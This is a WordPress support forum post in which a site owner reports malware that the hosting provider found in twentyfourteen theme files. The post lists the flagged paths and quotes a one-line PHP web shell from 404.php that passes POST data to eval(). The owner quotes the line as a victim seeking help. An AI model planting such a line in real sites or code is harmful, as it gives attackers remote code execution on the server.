Malware Detected in Theme Files

  • My hosting provider (WebFactional – ) has notified me of a number of security issues with my WordPress based website which is using the twentyfourteen theme.

    3 of the 5 effected files are part of the twentyfourteen theme:

    wp-content/themes/twentyfourteen/images/file.php
    wp-content/themes/twentyfourteen/404.php
    wp-content/themes/twentyfourteen/css/test77.php

    All of these files seem to contain PHP’s eval() function on one or more occasion, the 404 page even passes POST data to eval() ! “eval($_POST[‘p1’]);” That sounds like the worst possible idea anyone could have had? Surly that means an attacker can pass malicious PHP code in POST data and have it execute on my website!

    Can you please investigate these 3 files and the security risks my hosting provider has identified and provide me with an update as to how I can patch these issues.

    Kind regards,

    HARVS1789UK

Viewing 1 replies (of 1 total)
Viewing 1 replies (of 1 total)
  • The topic ‘Malware Detected in Theme Files’ is closed to new replies.